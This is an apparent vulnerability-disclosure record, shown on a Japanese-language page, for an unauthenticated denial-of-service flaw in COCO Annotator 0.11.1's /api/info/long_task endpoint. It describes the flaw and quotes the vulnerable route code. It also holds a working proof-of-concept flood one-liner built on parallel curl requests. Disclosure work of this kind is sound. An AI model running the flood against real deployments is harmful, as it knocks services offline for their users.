| タイトル | coco-annotator 0.11.1 Denial of Service |
|---|
| 説明 | ???? Summary
The endpoint: /api/info/long_task is exposed without authentication or rate limiting, and allows any remote user to enqueue Celery background tasks and write entries to the database (TaskModel) on every request.
This creates a critical Denial of Service (DoS) vulnerability. An attacker can flood the endpoint with repeated requests, overwhelming the Celery queue and workers, bloating the database, and rendering the entire application unresponsive — even after the attack stops.
???? Details
➤ Vulnerable Endpoint: /api/info/long_task
???? PoC
1. Run attack flood:
seq 1 9999999 | xargs -n1 -P50 curl -s http://localhost:5001/api/info/long_task > /dev/null
2. Observe symptoms:
Frontend (COCO Annotator) becomes unresponsive (“Loading datasets…” spinner indefinitely)
HTTP requests slow down or fail:
curl -o /dev/null -s -w "Total: %{time_total}s\n" http://localhost:5001/api/info/long_task
System logs show massive task creation and MongoDB inserts
redis-cli LLEN celery shows queue depth growing uncontrollably
3. Even after stopping the flood (CTRL+C), system remains unusable
Affected Code
@api.route('/long_task')
class TaskTest(Resource):
def get(self):
task_model = TaskModel(group="test", name="Testing Celery")
task_model.save()
task = long_task.delay(20, task_model.id)
return {'id': task.id, 'state': task.state}
Missing: @login_required, @limiter.limit(...) |
|---|
| ソース | ⚠️ https://github.com/nmmorette/vulnerability-research/blob/main/coco-anotator/Unauthenticated%20Task%20Queue%20Flood%20in%20COCO%20Annotator%202f1ef09b873680f99d39e3f7db9886fa.md |
|---|
| ユーザー | nmmorette (UID 87361) |
|---|
| 送信 | 2026年01月23日 14:20 (5 月 ago) |
|---|
| モデレーション | 2026年02月06日 15:23 (14 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 344684 [jsbroks COCO Annotator 迄 0.11.1 Endpoint /api/info/long_task サービス拒否] |
|---|
| ポイント | 20 |
|---|